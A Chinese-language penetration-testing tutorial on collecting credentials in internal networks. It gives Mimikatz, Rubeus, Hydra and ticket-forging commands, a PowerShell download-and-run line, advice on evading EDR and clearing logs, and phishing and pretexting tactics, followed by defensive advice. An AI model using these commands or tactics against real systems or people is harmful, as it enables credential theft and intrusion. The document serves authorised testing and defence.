在网络安全攻防对抗中,内网凭据收集是渗透测试的核心环节。攻击者一旦获取内网合法凭据,便能以此为跳板,实现横向移动与权限提升,最终控制核心业务系统。而对于防御方而言,只有透彻理解这些收集技术的逻辑,才能构建起针对性的纵深防护体系。
法律声明:本文所涉及的技术方法与思路,仅适用于已获得明确授权的渗透测试、安全评估等合规场景。任何未经授权的内网凭据获取行为,均违反《网络安全法》《个人信息保护法》等相关法律法规,需承担相应的法律责任。
一、本地系统凭据挖掘:从终端源头获取核心凭据
终端设备往往是内网凭据的主要载体。用户的登录信息、各类应用的配置密码、系统缓存的凭据等,都有可能存储于本地。本地挖掘的核心思路在于,定位系统和应用程序存储凭据的具体位置,再通过合法工具进行提取或破解。这个过程通常无需网络交互,因此隐蔽性相对较高。
(一)Windows系统本地凭据提取
Windows系统为了保障用户体验,会在内存、注册表以及各类配置文件中留存多种凭据,不同的存储位置对应着不同的提取技术。
1. 内存凭据提取:从lsass.exe进程突破
用户登录Windows系统后,其身份凭证会经过加密,并存储于 lsass.exe(本地安全授权子系统服务)进程的内存空间中。这成为了本地凭据提取最核心的目标。业界最常用的工具是Mimikatz,其核心原理是注入 lsass.exe 进程并读取其内存数据,从而提取明文密码、NTLM哈希、Kerberos票据等信息。
实操要点:
- 基础命令:以管理员权限运行Mimikatz后,首先执行
privilege::debug 提升权限,再通过 sekurlsa::logonPasswords 命令提取内存中的凭据。sekurlsa 模块是其核心功能,可直接读取 lsass.exe 中的敏感信息,无需与SAM数据库交互,因此比直接读取注册表更为隐蔽。
- 系统版本限制:Windows Vista及以上版本默认不再存储LM哈希;从Windows 8.1/Server 2012 R2开始,系统默认关闭了wdigest协议的明文存储功能,导致无法直接提取到明文密码。若需在高版本系统中获取明文,可通过修改注册表临时开启wdigest(路径:
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest,将 UseLogonCredential 设置为1),但这需要用户重新登录后才能生效,且极易触发安全审计告警。
- 无文件提取方案:在高版本Windows或部署了EDR的环境中,传统的Mimikatz可执行文件容易被拦截。此时可采用PowerShell内存加载的方式实现无文件攻击。例如,使用Invoke-Mimikatz脚本,通过命令
iex (New-Object Net.WebClient).DownloadString('http://your-server/Invoke-Mimikatz.ps1') 在内存中加载并执行,避免文件落地。
2. 注册表凭据挖掘
Windows注册表中存储了大量应用程序的配置和缓存凭据,是另一个重要的信息源。
常见挖掘位置包括:
- SAM数据库相关键值:
HKLM\SAM\SAM\Domains\Account\Users 下存储着本地用户的密码哈希。但该键值默认被系统锁定,需要通过 reg save 命令备份后离线破解。例如:reg save HKLM\SAM SAM.hiv 和 reg save HKLM\SYSTEM SYSTEM.hiv,之后使用hashcat、John the Ripper等工具破解其中的NTLM哈希。
- 远程桌面缓存:
HKLM\SOFTWARE\Microsoft\Terminal Server Client\Servers 路径下存储着RDP连接的历史记录,包括服务器地址和用户名。在某些版本中,甚至会缓存加密后的密码哈希,可以通过Mimikatz的 ts::mstsc 模块进行提取。
- 凭据管理器缓存:
HKCU\Software\Microsoft\Credentials 和 HKCU\Software\Microsoft\Protect 存储着Windows凭据管理器中的缓存凭据,例如访问网络共享、VPN或特定应用的登录信息。可以先通过 cmdkey /list 命令查看缓存列表,再结合Mimikatz的 vault::cred 模块提取明文或哈希。
3. 应用配置文件与日志挖掘
许多内网应用会将凭据以明文或弱加密形式存储在配置文件中,这往往是一个被忽视的突破口。
- Web应用配置:IIS服务器的
web.config 文件可能包含数据库连接字符串;Tomcat的 server.xml 文件中则可能存储着JDBC连接凭据。
- 客户端应用配置:FTP客户端(如FileZilla)的配置文件通常位于
%APPDATA%\FileZilla\sitemanager.xml,其中包含服务器地址、用户名和经过加密的密码,可通过专用脚本进行解密。邮件客户端(如Outlook)的配置文件位于 %APPDATA%\Microsoft\Outlook,可从中提取POP3/IMAP/SMTP服务的凭据。
- 日志文件:Windows事件日志是信息宝库,例如安全日志中的事件ID 4624/4625记录了登录成功/失败的信息,可通过
wevtutil qe Security /q:\"*[System[EventID=4624]]\" /f:text 命令导出并筛选用户名、登录IP等关键信息。此外,应用日志(如MySQL、SQL Server的错误日志)有时也会意外记录包含凭据的SQL语句。
(二)Linux系统本地凭据提取
Linux系统的凭据存储机制与Windows不同,其核心凭据多存放于 /etc 目录下的配置文件及用户家目录中,提取技术更依赖于命令行检索。
1. 核心配置文件挖掘
- /etc/passwd 与 /etc/shadow:
/etc/passwd 存储用户基本信息(所有用户可读),而加密后的用户密码哈希则存储在仅root用户可读的 /etc/shadow 文件中。在获取root权限后,可直接读取 /etc/shadow 并使用hashcat破解其中的SHA-512哈希。如果权限配置有误(例如 /etc/shadow 被误设为755权限),也可能在非root权限下读取。
- 应用配置文件:Apache的
httpd.conf、Nginx的 nginx.conf 中可能包含虚拟主机配置或基本的HTTP认证凭据;数据库服务(如MySQL的 my.cnf、PostgreSQL的 pg_hba.conf 和连接文件)的配置中可能明文存放管理员密码或配置了免密登录;SSH服务的 /etc/ssh/sshd_config 若配置了密钥登录,则可在用户家目录的 ~/.ssh/ 下查找 id_rsa(私钥)、authorized_keys(授权公钥)等文件。
2. 内存与进程凭据提取
在Linux系统中,运行中的进程内存里也可能留存着明文凭据,例如数据库连接密码或应用服务的认证信息。
可以通过GDB调试器或进程内存Dump工具来提取。例如,先通过 ps -ef | grep mysql 找到MySQL服务的进程PID,然后使用 gdb --pid [PID] -batch -ex \"generate-core-file\" 生成该进程的内存Dump文件,最后通过 strings 命令在该文件中检索“password”、“root”等敏感字符串。
3. 历史命令与缓存挖掘
Linux用户执行过的命令默认存储在 ~/.bash_history 文件中。如果用户曾在命令行中直接输入密码(例如 mysql -u root -p123456),这条包含密码的命令就会被完整记录。可以通过 cat ~/.bash_history | grep -E \"password|pass| -p\" 命令来快速筛选敏感信息。此外,像Git这类应用会缓存远程仓库的认证凭据,通常存放在 ~/.git-credentials 文件中。
二、网络服务凭据探测:利用服务暴露获取凭据
内网中存在大量需要身份认证的网络服务,如SSH、SMB、RDP以及各类数据库服务。攻击者可以通过端口扫描、弱口令爆破、协议漏洞利用等方式尝试获取访问凭据。这一环节需要与目标服务建立网络连接,因此更容易触发流量审计,需要特别注意控制扫描频率和爆破策略。
(一)前置准备:内网资产扫描与服务识别
进行网络服务探测的前提是摸清内网资产的分布情况和开放的服务端口。常用工具有Nmap、Masscan等,而在内网环境中,像SharpScan这样集成多种功能且支持无文件落地的工具往往更具优势。
实操要点:
- 存活主机探测:优先使用ARP协议进行扫描(仅适用于同一广播域/网段),因为ICMP协议(Ping)很可能被防火墙拦截。例如使用SharpScan命令:
SharpScan.exe -h 192.168.1.0/24 -nopoc,可以快速探测该网段内存活的主机。
- 服务端口扫描:针对发现的存活主机,需要进一步扫描常见的服务端口,如22(SSH)、135(WMI)、139/445(SMB)、3389(RDP)、3306(MySQL)、5432(PostgreSQL)等。使用SharpScan命令:
SharpScan.exe -s 192.168.1.100 -p 1-1024 -d 0 -m 600,可以指定端口范围和并发数,有效减少扫描耗时。
- 服务版本识别:通过识别端口对应的服务指纹,可以确定服务的具体类型和版本号,为后续的爆破或漏洞利用提供关键依据。例如,使用Nmap命令:
nmap -sV 192.168.1.100 -p 445,可以识别出SMB服务的具体版本,进而判断是否存在MS17-010(永恒之蓝)、SMBGhost等高危漏洞。
(二)弱口令爆破与密码喷洒
弱口令堪称内网最常见的安全隐患。据统计,高达60%的企业内网存在弱口令问题,甚至32%的域控制器服务器也使用着弱密码。弱口令爆破的核心在于构建一个合理、高效的密码字典,并结合服务特性控制爆破频率,避免触发账号锁定机制。
1. 常见服务爆破方法
- SMB服务爆破:内网中445端口(SMB服务)暴露非常广泛。可以使用SharpScan或Hydra等工具进行爆破。例如SharpScan命令:
SharpScan.exe -h 192.168.1.0/24 -m smb -uf user.txt -pwf pass.txt,利用用户名字典和密码字典对内网网段进行SMB服务的批量爆破。
- SSH服务爆破:Linux服务器的SSH服务(22端口)是重点目标。可使用Hydra命令:
hydra -L user.txt -P pass.txt -t 4 192.168.1.100 ssh,其中 -t 参数用于控制并发线程数(建议4-8个,避免因请求过快被防火墙拦截)。
- RDP服务爆破:针对Windows远程桌面服务(3389端口)进行爆破时需要格外小心,因为很多系统都开启了账号锁定策略。建议采用“密码喷洒”策略。例如SharpScan命令:
SharpScan.exe -h 192.168.1.0/24 -m rdp -uf user.txt -pwf pass.txt,并结合针对性的字典(如“公司名+年份”、“Admin@123”等)进行尝试。
- 数据库服务爆破:对于MySQL(3306端口)、SQL Server(1433端口)等服务,可使用专用工具。MySQL爆破示例:
hydra -L user.txt -P pass.txt 192.168.1.100 mysql。SQL Server爆破则可使用SharpScan的msql模块,它支持在爆破成功后直接验证凭据并执行命令。
2. 密码喷洒策略(避免账号锁定)
传统爆破模式(针对一个账号尝试多个密码)极易触发账号锁定策略。而“密码喷洒”策略则反其道而行之,即用一个或少量密码去尝试多个用户账号,这种方式在内网域环境中尤其有效,特别是针对那些可能存在的通用初始密码。
实操要点:
- 字典构建:优先收集内网信息,如公司名称、产品缩写、员工常见姓名、部门代号、当前年份等,构建极具针对性的密码字典(例如“Company@2024”、“ZhangSan123”),这能大幅减少无效尝试,提升效率。
- 工具选型:SharpScan集成了自动化的密码喷洒功能。使用命令:
SharpScan.exe -h 192.168.1.100 -m passwordspray -uf user.txt -pw Password@123,即可用指定的单个密码去批量尝试用户列表中的所有账号。
- 频率控制:在尝试每个账号后,建议暂停3-5秒,避免在短时间内产生大量失败的认证请求,从而触发防火墙或安全设备的告警。选择在非工作时间(如凌晨)执行此类操作,也能显著降低被发现的风险。
(三)协议漏洞与配置错误利用
部分网络服务由于未及时修复高危漏洞或存在配置错误,可能允许攻击者直接获取凭据甚至绕过认证。在网络安全攻防实践中,这类机会不容错过。
常见场景包括:
- SMB服务漏洞:MS17-010(永恒之蓝)漏洞可直接获取系统权限,进而提取本地凭据;SMBGhost(CVE-2020-0796)漏洞则可通过特制的SMB数据包触发内存越界读取,可能泄露包含凭据信息的内存数据。可使用SharpScan命令
SharpScan.exe -h 192.168.1.0/24 -m ms17010 批量扫描内网中存在该漏洞的主机。
- RDP服务配置错误:部分主机在开启RDP服务时,未禁用“允许使用空密码登录”的选项,攻击者可尝试使用空密码登录guest等常见账号;或者存在“网络级别身份验证(NLA)”绕过漏洞,可能直接获取登录权限。
- 数据库配置错误:MySQL数据库开启了远程登录权限,且root账号使用了弱密码;SQL Server数据库启用了sa账号,且密码为空或过于简单。这些配置错误都可能导致攻击者直接远程登录数据库,进而获取数据库中存储的其他业务系统凭据。
三、域环境凭据收集:横向移动的核心突破点
现代企业内网广泛采用域(Active Directory)环境进行集中化管理。域控制器(DC)存储了所有域用户的凭据信息,一旦获取域凭据,攻击者便能在全域范围内进行高效的横向移动。域环境凭据收集的核心,在于巧妙利用Kerberos协议的设计特性和域控相关服务的漏洞。
(一)Kerberos协议漏洞利用:Kerberoasting攻击
Kerberos是域环境的核心认证协议。SPN(服务主体名称)是服务在Kerberos网络中的唯一标识。Kerberoasting攻击正是利用了Kerberos协议的一个特点:任何通过认证的域用户都可以为注册了SPN的服务账号请求服务票据(ST),而该票据是用服务账号的密码哈希加密的,从而为离线破解提供了可能。
攻击流程:
- SPN扫描:在域内,任何已通过认证的用户都可以查询SPN,以定位那些运行在域用户账号(而非机器账号)下的服务。常用命令是
setspn -Q */*。也可以使用SharpScan的userenum模块:SharpScan.exe -h [域控IP] -m userenum -uf user.txt。
- 请求服务票据:使用Mimikatz或Rubeus等工具,向域控制器请求目标SPN的服务票据。例如,使用Rubeus命令:
Rubeus.exe kerberoast /outfile:tickets.kirbi,可以将请求到的、使用服务账号哈希加密的票据导出到文件。
- 离线破解:导出的服务票据文件可以使用hashcat或John the Ripper进行离线破解。例如hashcat命令:
hashcat -m 13100 tickets.kirbi pass.txt,其中 -m 13100 指定了Kerberos 5 TGS-REP etype 23 (RC4) 的哈希模式。
优势与注意事项:Kerberoasting攻击最大的优势在于,它只需要普通域用户的权限即可执行,且攻击过程中产生的网络流量与正常服务访问无异,难以被检测。但它的成功率完全依赖于服务账号密码的强度。因此,在实战中应优先针对那些运行在高权限域账号(如SQL Server服务账号、Web应用服务账号)下的SPN进行尝试。
(二)域控凭据提取:黄金票据与白银票据
黄金票据和白银票据是两种利用Kerberos协议缺陷的高阶持久化攻击技术,能够直接绕过正常的认证流程。
- 黄金票据(Golden Ticket):攻击者需要先获取域控制器中
KRBTGT 账号的密码哈希。KRBTGT 是域内用于加密所有票据授予票据(TGT)的密钥。一旦获得此哈希,便可以伪造任意用户的TGT,从而获得访问域内任何资源(理论上)的权限。获取 KRBTGT 哈希通常需要域管理员权限,可通过Mimikatz的 lsadump::dcsync /domain:your-domain.com /user:krbtgt 命令(即DCSync攻击)来提取。伪造黄金票据的命令类似:kerberos::golden /user:Administrator /domain:your-domain.com /sid:[域SID] /krbtgt:[KRBTGT哈希] /ticket:golden.kirbi,导入此票据后即获得域管理员权限。
- 白银票据(Silver Ticket):与黄金票据不同,白银票据无需
KRBTGT 哈希,它只需要目标服务账号的密码哈希(通常是机器账号的哈希),用于伪造针对特定服务的服务票据(ST)。例如,针对某台文件服务器的SMB服务伪造白银票据,获取该票据后便可直接访问其共享,而无需与域控进行任何交互。伪造命令示例:kerberos::golden /user:Administrator /domain:your-domain.com /sid:[域SID] /target:server01.your-domain.com /service:cifs /rc4:[机器账号哈希] /ticket:silver.kirbi。
风险提示:黄金票据攻击由于会伪造 KRBTGT 签发的TGT,一旦域控重置 KRBTGT 密码,所有现有合法票据都将失效,因此攻击容易被快速发现。白银票据的攻击范围仅限于伪造时指定的服务,隐蔽性相对更高,但用途也受限。
(三)域内信息枚举与凭据推导
通过系统性地枚举域内信息,可以获取用户列表、组关系、主机列表等,进而结合社会工程学推导出潜在的凭据规律。常用工具包括内建的net命令、SharpScan以及图形化的BloodHound。
- 域用户与组枚举:使用
net user /domain 可以列出所有域用户;net group \"Domain Admins\" /domain 可以查询域管理员组的成员。SharpScan的域信息收集命令 SharpScan.exe -h [域控IP] -m domaininfo 能自动收集域控FQDN、各类管理员组信息等。
- 凭据推导:结合枚举到的用户名(如 zhangsan),可以尝试推导密码规律。常见模式包括:“姓名全拼+年份”(zhangsan2024)、“姓名首字母+姓氏+部门”(zsanIT)、“公司缩写+统一后缀”等。对于域管理员账号,则可能使用“Admin@公司缩写+年份”这类规律。
- BloodHound分析:BloodHound通过收集域内的ACL、组关系、会话等信息,构建出清晰的攻击路径图。它能够揭示诸如“一个普通域用户可以通过哪条路径(如具有某主机的本地管理员权限)最终控制域控制器”这样的关系,帮助攻击者精准定位凭据收集的优先目标。
四、突破技术防护的人性弱点
即使技术防护措施再严密,人性的弱点也常常成为安全链条中最脆弱的一环。社会工程学辅助的凭据收集,其核心就是利用员工的疏忽、好奇或服从心理,诱使其主动泄露或输入合法凭据。
(一)钓鱼邮件攻击
钓鱼邮件是获取内网凭据最经典且高效的社会工程学手段。攻击者通过伪造看似合法的邮件(如IT部门系统升级通知、HR的会议邀请),诱导员工点击恶意链接或下载包含恶意代码的附件。
实操要点:
- 邮件伪造:伪造发件人邮箱,使其看起来来自企业内部(例如,将
@company.com 伪造成 @company-com.com 或使用相似的显示名)。邮件主题需具备足够的迷惑性和紧迫感,如“【紧急】您的邮箱将于2小时后停用,请立即验证”、“关于年终奖金核对的重要通知”。
- 恶意载体:附件可以是带有恶意宏代码的Word或Excel文档,一旦员工启用宏,便会执行PowerShell脚本窃取本地凭据。恶意链接则指向一个精心仿冒的企业OA、邮箱或VPN登录页面,实时捕获员工输入的账号密码。
- 精准钓鱼:通过前期信息收集(企业官网、社交媒体),获取特定部门或员工的详细信息,发送高度个性化的邮件。例如,针对财务部门发送“2023年度财务报销系统升级与密码重置指南”,成功率会显著提升。
(二)水坑攻击与物理接触攻击
- 水坑攻击:攻击者并不直接攻击目标员工,而是入侵目标员工经常访问的内网网站或文件服务器(如公司内部知识库、共享盘),在其中植入恶意代码或篡改常用文档。当员工毫无防备地访问这些“被污染”的资源时,就会中招。例如,在内网共享的“周报模板.xlsm”中植入宏病毒。
- 物理接触攻击:通过伪装成维修人员、访客等身份,直接进入办公区域或机房。利用未锁屏的办公电脑,直接查看浏览器保存的密码、打开的文档或即时通讯软件中的信息。也可以插入带有恶意固件或自动运行脚本的U盘(俗称“摆渡攻击”),在电脑上自动执行凭据窃取程序。
(三)内部人员诱导
通过伪装成同事、上级领导或IT支持人员,利用即时通讯工具或电话直接与员工沟通,诱导其泄露凭据。
- 即时通讯诱导:在企业微信、钉钉等工作群里,或通过私聊,伪装成IT运维人员,以“系统故障排查需要验证您的账号”或“安全审计需要您配合输入一次密码”为由,索要账号密码。
- 电话诱导:冒充IT支持中心的工作人员,致电给员工,声称监测到其账号存在异常登录活动,需要立即重置密码以保护安全,进而诱导员工在电话中告知当前密码,或点击其发送的“密码重置链接”(实为钓鱼链接)。
五、工具选型与实操避坑指南
在内网凭据收集过程中,选择合适的工具并规避常见陷阱,是决定行动成败的关键。
(一)核心工具分类与使用场景
| 工具类型 |
代表工具 |
核心功能 |
适用场景 |
| 本地凭据提取 |
Mimikatz, Invoke-Mimikatz |
提取内存凭据、注册表凭据、Kerberos票据 |
Windows终端本地挖掘、域环境票据导出 |
| 内网扫描与爆破 |
SharpScan, Hydra, Nmap |
资产扫描、服务识别、弱口令爆破 |
内网大范围资产探测、多服务批量爆破 |
| 域环境专用 |
Rubeus, BloodHound, SharpScan |
Kerberoasting攻击、域信息枚举、信任关系分析 |
域环境凭据收集、横向移动路径规划 |
| 无文件攻击 |
PowerShell Empire, Cobalt Strike |
内存加载脚本、远程命令执行、载荷投递 |
高安全级别环境,规避EDR文件检测 |
| 密码破解 |
Hashcat, John the Ripper |
NTLM/SHA哈希破解、Kerberos票据破解 |
离线破解提取到的哈希和票据文件 |
(二)实操避坑关键点
- 规避EDR检测:优先采用无文件执行方式,如PowerShell内存加载、WMI远程执行、 .NET程序集加载等。对工具本身进行混淆、加密或源码级修改,以绕过反病毒软件和AMSI(反恶意软件扫描接口)的静态与动态检测。
- 避免账号锁定:在进行爆破前,应尽可能先探测目标的账号锁定策略(例如,在域内可使用
net accounts /domain 查看锁定阈值)。积极采用“密码喷洒”策略而非传统爆破。尽量使用已获取的低权限账号进行探测,避免直接对高价值管理员账号进行暴力尝试。
- 减少日志留存:在执行敏感操作时,应避免使用会产生大量明显日志的系统命令(如
net use, net view)。优先选用像SharpScan这类遵循OPSEC(行动安全)原则、减少子进程创建和命令行记录的工具。在条件允许且必要时,在操作完成后清理相关的事件日志(如使用 wevtutil cl Security 清理安全日志,但此行为本身也会留下日志)。
- 网络流量控制:在进行扫描和爆破时,严格控制并发线程数和请求频率,避免触发现代网络防火墙或IPS/IDS的流量阈值告警。使用内网代理(如Socks5代理)来隐藏真实的攻击源IP。SharpScan等工具支持通过参数指定代理,实现流量的中转。
六、防御建议
内网凭据泄露的根源,往往在于技术配置的缺陷和安全管理的疏漏。企业需要从技术、管理和人员三个层面构建一体化的防护体系。
(一)技术防护措施
- 启用凭据保护机制:在Windows 10/Server 2016及以上系统中,启用Credential Guard和LSA保护,利用虚拟化安全技术防止对
lsass.exe 进程的内存读取攻击。在域环境中,确保所有用户账户都启用了Kerberos预认证,这是防范Kerberoasting和AS-REP Roasting攻击的基础。
- 强化密码策略:实施并执行强密码策略,要求密码长度至少12位,并混合大小写字母、数字和特殊符号。启用定期密码轮换机制(如每90天),并禁止密码的重复使用。利用自动化工具定期扫描和禁用域内存在的弱口令、空口令账户。
- 部署终端与网络安全工具:在所有终端部署EDR解决方案,实时监控内存注入、异常的PowerShell/WMI执行、凭证转储等可疑行为。在网络边界和核心区域部署下一代防火墙、IDS/IPS,严格限制内网服务的访问范围,例如仅允许运维堡垒机IP访问管理端口(3389, 22, 445等)。
- 定期漏洞修复与加固:建立严格的漏洞管理流程,及时修复SMB、RDP、数据库等服务的高危漏洞(如MS17-010、Zerologon)。定期更新操作系统和应用程序至安全版本。遵循最小权限原则,关闭所有非必要的系统服务和网络端口。
(二)管理防护措施
- 实施最小权限原则:为所有员工和系统服务账号分配完成工作所必需的最小权限,日常办公严禁使用管理员权限账户。对域管理员等高权限账户的使用进行严格审批和监控。
- 建立完善的安全审计机制:集中收集并定期审计域控、关键服务器的登录日志、账号管理日志、特权操作日志。部署SIEM或安全分析平台,建立针对异常票据请求(如大量的TGS-REQ)、哈希提取事件(如对lsass.exe的访问)的告警规则。
- 规范第三方访问管理:对第三方供应商、运维人员的远程访问实施严格的临时账号授权制度,明确其访问范围、权限和时间,并在任务结束后立即收回。对第三方提供的软件和系统进行安全评估,防范供应链攻击。
(三)人员安全意识培养
- 定期开展全员安全培训:将钓鱼邮件识别、密码安全、物理安全(锁屏)、敏感信息处理等内容作为入职培训和年度复训的必修课,利用真实案例提升员工的警惕性。
- 开展模拟钓鱼演练:安全团队应定期组织内部的模拟钓鱼邮件攻击,统计员工的点击率和数据提交率,并对“中招”的员工进行一对一的教育和指导,将演练结果作为改进培训效果的依据。
- 建立通畅的安全举报通道:鼓励员工通过简便的渠道(如专用邮箱、即时通讯群)举报任何可疑的邮件、电话、链接或人员行为。建立快速响应机制,对举报内容进行核实和处理,并对有效举报给予适当奖励,营造积极的安全文化。
总结
内网凭据收集是一个覆盖本地、网络、协议、社会工程等多维度的综合性技术体系,是攻防对抗中情报收集与权限突破的关键。对于渗透测试与安全研究人员而言,深入理解其原理,灵活组合运用各类技术,并时刻关注OPSEC,是成功的关键。而对于企业防御者来说,认清自身在技术配置、流程管理和人员意识上的短板,构建起“技术防御+严格管理+全员意识”的纵深防御体系,才是抵御凭据窃取、守护内网安全的根本之道。欢迎在 云栈社区 的安全技术板块与我们继续探讨相关攻防技术与最佳实践。